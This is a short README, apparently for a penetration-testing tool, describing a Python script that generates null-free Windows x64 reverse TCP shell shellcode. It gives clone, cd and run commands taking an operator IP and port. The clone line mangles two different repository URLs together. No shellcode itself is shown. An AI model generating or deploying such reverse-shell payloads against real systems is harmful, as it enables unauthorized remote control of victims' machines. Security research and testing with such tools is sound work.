Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode. Platform: Windows X64 # Tested on: Windows 11 Home/Windows Server 2022 Standard/Windows Server 2019 Datacenter
This is a Python script designed to generate shellcode for creating reverse TCP shells, primarily for educational and research purposes. The shellcode generated by this tool can be used to facilitate remote access to systems during penetration testing or other security assessments.
Usage
-Clone the Repository:
git clone https://github.com/Type2Tech/Shellcode-Generator.git](https://github.com/blackmagic2023/Windows-x64---PIC-Null-Free-TCP-Reverse-Shell-Shellcode.git-Navigate to the Directory:
cd Windows-x64---PIC-Null-Free-TCP-Reverse-Shell-Shellcode- Run the Script:
python shellcode_generator.py -i [YOUR_IP_ADDRESS] -p [PORT_NUMBER] -o [OUTPUT_FILENAME](Replace [YOUR_IP_ADDRESS] with your server's IP address and [PORT_NUMBER] with the desired port for the reverse shell connection. Optionally, you can specify an output filename with -o).
This tool is intended for educational and research purposes only. Misuse of this tool for unauthorized access to computer systems or networks is illegal and unethical. Use it responsibly and only on systems you own or have explicit permission to test.
By using this tool, you agree that the developers and contributors are not liable for any misuse or damage caused by its usage.